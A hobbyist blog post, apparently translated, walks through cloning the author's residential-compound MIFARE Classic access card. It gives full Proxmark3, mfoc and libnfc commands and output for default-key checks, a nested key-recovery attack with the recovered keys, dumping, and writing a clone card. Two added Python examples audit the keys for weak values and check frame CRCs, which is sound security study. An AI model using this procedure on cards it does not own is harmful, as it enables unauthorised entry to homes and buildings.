Because I changed jobs and moved to a new residential compound, I got a new toy: the compound's access card.
As usual, the same old routine.
First, use the ACR122 to identify the card type:

```
nfc-list
nfc-list uses libnfc 1.7.1
NFC device: ACR122U Smart Card Reader / opened
1 ISO14443A passive target(s) found:
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
UID (NFCID1): 1e aa 7b 55
SAK (SEL_RES): 08
```
Seeing ISO14443A and ATQA 0004, my initial guess is a MIFARE Classic (M1) card.
Since I didn't know whether the card was fully encrypted, I just threw mfoc at it:

```
mfoc -O xxx.dump
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): 1e aa 7b 55
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:
Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
nfc_initiator_mifare_cmd: Invalid argument(s)
[Key: ffffffffffff] -> [#
```
Then it just stopped.
It is definitely an M1 card.
Is this an incompatibility or what?
Surely it isn't a CPU card... feels like I've run into a challenge.
By the way, the flat in that compound is opened with this same card.
Bring out the Proxmark3.
Check the card information:

```
proxmark3> hf 14a reader
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# Stopped
UID : 1e aa 7b 55
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
Answers to chinese magic backdoor commands: NO
```
Check whether the card uses any default keys:

```
proxmark3> hf mf chk *1 ? t
No key specified, trying default keys
chk default key[ 0] ffffffffffff
chk default key[ 1] 000000000000
chk default key[ 2] a0a1a2a3a4a5
chk default key[ 3] b0b1b2b3b4b5
chk default key[ 4] aabbccddeeff
chk default key[ 5] 4d3a99c351dd
chk default key[ 6] 1a982c7e459a
chk default key[ 7] d3f7d3f7d3f7
chk default key[ 8] 714c5c886e97
chk default key[ 9] 587ee5f9350f
chk default key[10] a0478cc39091
chk default key[11] 533cb6c723f6
chk default key[12] 8fd0a4f256e9
--sector: 0, block: 3, key type:A, key count:13
Found valid key:[ffffffffffff]
--sector: 1, block: 7, key type:A, key count:13
--sector: 2, block: 11, key type:A, key count:13
...
Found valid key:[ffffffffffff]
--sector:10, block: 43, key type:A, key count:13
Found valid key:[ffffffffffff]
--sector:11, block: 47, key type:A, key count:13
Found valid key:[ffffffffffff]
--sector:12, block: 51, key type:A, key count:13
Found valid key:[ffffffffffff]
--sector:13, block: 55, key type:A, key count:13
Found valid key:[ffffffffffff]
--sector:14, block: 59, key type:A, key count:13
Found valid key:[ffffffffffff]
--sector:15, block: 63, key type:A, key count:13
Found valid key:[ffffffffffff]
--sector: 0, block: 3, key type:B, key count:13
Found valid key:[ffffffffffff]
--sector: 1, block: 7, key type:B, key count:13
--sector: 2, block: 11, key type:B, key count:13
...
Found valid key:[ffffffffffff]
--sector:10, block: 43, key type:B, key count:13
Found valid key:[ffffffffffff]
--sector:11, block: 47, key type:B, key count:13
Found valid key:[ffffffffffff]
--sector:12, block: 51, key type:B, key count:13
Found valid key:[ffffffffffff]
--sector:13, block: 55, key type:B, key count:13
Found valid key:[ffffffffffff]
--sector:14, block: 59, key type:B, key count:13
Found valid key:[ffffffffffff]
--sector:15, block: 63, key type:B, key count:13
Found valid key:[ffffffffffff]
Found keys have been transferred to the emulator memory
```
Some output omitted in the middle.
Use the known key to probe the other sectors (nested attack):

```
proxmark3> hf mf nested 1 3 A FFFFFFFFFFFF d
Testing known keys. Sector count=16
nested...
-----------------------------------------------
uid:1eaa7b55 trgbl=4 trgkey=0
-----------------------------------------------
uid:1eaa7b55 trgbl=4 trgkey=1
-----------------------------------------------
uid:1eaa7b55 trgbl=8 trgkey=0
Found valid key:201604139999
-----------------------------------------------
uid:1eaa7b55 trgbl=8 trgkey=1
-----------------------------------------------
uid:1eaa7b55 trgbl=12 trgkey=0
Found valid key:201604139999
-----------------------------------------------
uid:1eaa7b55 trgbl=4 trgkey=0
Found valid key:abc6d5e4f3ba
-----------------------------------------------
uid:1eaa7b55 trgbl=4 trgkey=1
Found valid key:abc6d5e4f3ba
-----------------------------------------------
uid:1eaa7b55 trgbl=8 trgkey=1
-----------------------------------------------
uid:1eaa7b55 trgbl=16 trgkey=0
Found valid key:201604139999
-----------------------------------------------
uid:1eaa7b55 trgbl=16 trgkey=1
-----------------------------------------------
Time in nested: 30.536 (0.599 sec per key)
-----------------------------------------------
Iterations count: 51
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|001| abc6d5e4f3ba | 1 | abc6d5e4f3ba | 1 |
|002| 201604139999 | 1 | 000000000000 | 0 |
|003| 201604139999 | 1 | 201604139999 | 1 |
|004| 201604139999 | 1 | 201604139999 | 1 |
|005| 201604139999 | 1 | 201604139999 | 1 |
|006| 201604139999 | 1 | 201604139999 | 1 |
|007| 201604139999 | 1 | 201604139999 | 1 |
|008| 201604139999 | 1 | 201604139999 | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| ffffffffffff | 1 | ffffffffffff | 1 |
|011| ffffffffffff | 1 | ffffffffffff | 1 |
|012| ffffffffffff | 1 | ffffffffffff | 1 |
|013| ffffffffffff | 1 | ffffffffffff | 1 |
|014| ffffffffffff | 1 | ffffffffffff | 1 |
|015| ffffffffffff | 1 | ffffffffffff | 1 |
|---|----------------|---|----------------|---|
Printing keys to binary file dumpkeys.bin...
```
Now that we have keys, we can point mfoc at them to crack the rest.
Put the keys into keys.txt.
mfoc uses the ACR122 device.
Then run mfoc; exporting a dump with mfoc is more convenient anyway:

```
mfoc -f keys.txt -O xxx.dump
```

I won't show the sector data that follows.
The card data is now saved in xxx.dump.
By the way, one of the keys is 201604139999, which is obviously a date.
So I searched for "<compound name> 2016".
It turns out that date is right around when the flats were handed over; probably when the property management made the cards, lol.
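The key table above, read the way the property manager who issued these cards should read it: an added example (not Proxmark3 or libnfc code) that parses the `hf mf nested` table and flags sectors still on factory-default keys or on a low-entropy, date-like key such as the 201604139999 just noted. DEFAULT_KEYS is an assumed shortlist, and only five rows of the table are embedded.

```python
"""Audit a Proxmark3 `hf mf nested` key table for weak MIFARE Classic keys.
Added example for this post; not Proxmark3 or libnfc code.  Rows are copied
from the post's table; DEFAULT_KEYS is an assumed shortlist of default keys."""
import re

# Assumption: keys a property manager should treat as "not really a secret".
DEFAULT_KEYS = {"ffffffffffff", "000000000000", "a0a1a2a3a4a5",
                "b0b1b2b3b4b5", "aabbccddeeff", "d3f7d3f7d3f7"}

# Five rows from the post's key table (sector | key A | found | key B | found)
KEY_TABLE = """
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|001| abc6d5e4f3ba | 1 | abc6d5e4f3ba | 1 |
|002| 201604139999 | 1 | 000000000000 | 0 |
|003| 201604139999 | 1 | 201604139999 | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
"""

ROW = re.compile(r"\|(\d{3})\|\s*([0-9a-f]{12})\s*\|\s*([01])\s*\|"
                 r"\s*([0-9a-f]{12})\s*\|\s*([01])\s*\|")

def parse_key_table(text):
    """Map sector number -> {"A": (key, recovered), "B": (key, recovered)}."""
    sectors = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            sec, key_a, res_a, key_b, res_b = m.groups()
            sectors[int(sec)] = {"A": (key_a, res_a == "1"), "B": (key_b, res_b == "1")}
    return sectors

def looks_like_date(key):
    """Heuristic from the post: all-decimal hex digits that start with a YYYYMMDD."""
    if not key.isdigit():
        return False
    year, month, day = int(key[:4]), int(key[4:6]), int(key[6:8])
    return 1990 <= year <= 2099 and 1 <= month <= 12 and 1 <= day <= 31

def audit(sectors):
    """Return (sector, key type, finding) for each key the deployment should not rely on."""
    findings = []
    for sec in sorted(sectors):
        for ktype, (key, recovered) in sectors[sec].items():
            if not recovered:
                findings.append((sec, ktype, "not recovered"))
            elif key in DEFAULT_KEYS:
                findings.append((sec, ktype, "factory default key"))
            elif looks_like_date(key):
                findings.append((sec, ktype, "low-entropy key (looks like a date)"))
    return findings
```

Only sector 1 comes out clean; every other embedded row is either a factory default or a key an attacker would guess from the hand-over date.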
Writing the card: it's more convenient to do with the ACR122.
First set the UID:

```
nfc-mfsetuid 1eaa7b55
NFC reader: ACR122U Smart Card Reader / opened
Sent bits: 26 (7 bits)
Received bits: 04 00
Sent bits: 93 20
Received bits: 1e aa 7b 55 9a
Sent bits: 93 70 1e aa 7b 55 9a 15 4d
Received bits: 08 b6 dd
Found tag with
UID: 1eaa7b55
ATQA: 0004
SAK: 08
Sent bits: 50 00 57 cd
Sent bits: 40 (7 bits)
Received bits: a (4 bits)
Sent bits: 43
Received bits: 0a
Sent bits: a0 00 5f b1
Received bits: 0a
Sent bits: 1e aa 7b 55 9a 08 04 00 46 59 25 58 49 10 23 02 02 4b
Received bits: 0a
```
Because it had already been written once, the UID shown is already the same.
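To show what the reader-side integrity checks in that trace actually are, here is an added example (not libnfc's code) that recomputes the BCC of the anticollision reply and the CRC_A of every CRC-bearing frame from the trace above, and splits the block 0 contents into UID, BCC, SAK, ATQA and manufacturer bytes. The frame names are my own labels; the bytes are copied verbatim from the trace.

```python
"""Check the ISO 14443-3A frames from the nfc-mfsetuid trace above.
Added example for this post, not libnfc code: CRC_A follows ISO 14443-3
Annex B, and every frame in FRAMES is copied verbatim from the trace."""

def crc_a(data):
    """CRC_A (init 0x6363, reflected poly 0x8408); sent low byte first."""
    crc = 0x6363
    for byte in data:
        byte ^= crc & 0xFF
        byte ^= (byte << 4) & 0xFF
        crc = ((crc >> 8) ^ (byte << 8) ^ (byte << 3) ^ (byte >> 4)) & 0xFFFF
    return bytes([crc & 0xFF, crc >> 8])

def bcc(uid):
    """Block check character: XOR of the four UID bytes (anticollision)."""
    return uid[0] ^ uid[1] ^ uid[2] ^ uid[3]

def crc_ok(frame):
    """True when the trailing two bytes are the CRC_A of the rest of the frame."""
    return len(frame) > 2 and crc_a(frame[:-2]) == frame[-2:]

def decode_block0(frame):
    """Split the 16-byte manufacturer block (+CRC) that the trace writes to block 0."""
    d = frame[:16]
    uid = d[0:4]
    return {"uid": uid.hex(), "bcc_ok": d[4] == bcc(uid), "sak": d[5],
            # ATQA travels LSB first: on-air bytes 04 00 are the value 0x0004
            "atqa": d[6] | (d[7] << 8), "manufacturer": d[8:16].hex(),
            "crc_ok": crc_ok(frame)}

# Frames copied from the trace; the dictionary keys are constructed labels
FRAMES = {
    "anticollision reply": bytes.fromhex("1eaa7b559a"),    # UID + BCC, no CRC
    "SELECT": bytes.fromhex("93701eaa7b559a154d"),         # 93 70 + UID + BCC + CRC
    "SAK reply": bytes.fromhex("08b6dd"),
    "HLTA": bytes.fromhex("500057cd"),
    "write block 0 command": bytes.fromhex("a0005fb1"),
    "block 0 data": bytes.fromhex("1eaa7b559a0804004659255849102302024b"),
}

def check_trace(frames=FRAMES):
    """Label -> True/False for the BCC or CRC_A check that applies to each frame."""
    results = {}
    for name, frame in frames.items():
        if name == "anticollision reply":
            results[name] = frame[4] == bcc(frame[:4])
        else:
            results[name] = crc_ok(frame)
    return results
```

Every frame in the trace verifies, which is what you would expect from a card and reader that both implement the standard; a tag that answered with a bad BCC or CRC is the first thing a stricter reader could reject.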
Then write the data:

```
nfc-mfclassic W b xxx.dump xxx.dump
```

And the copy is done.
Tested, and it works.
Explanation of the parameters:
write to (w)
unlocked write to (W) card
Uppercase W is an unlocked write.
Lowercase b means use key B for the operation and abort on the first error.
The first dump is used to read the keys.
The second dump is the data written to the card.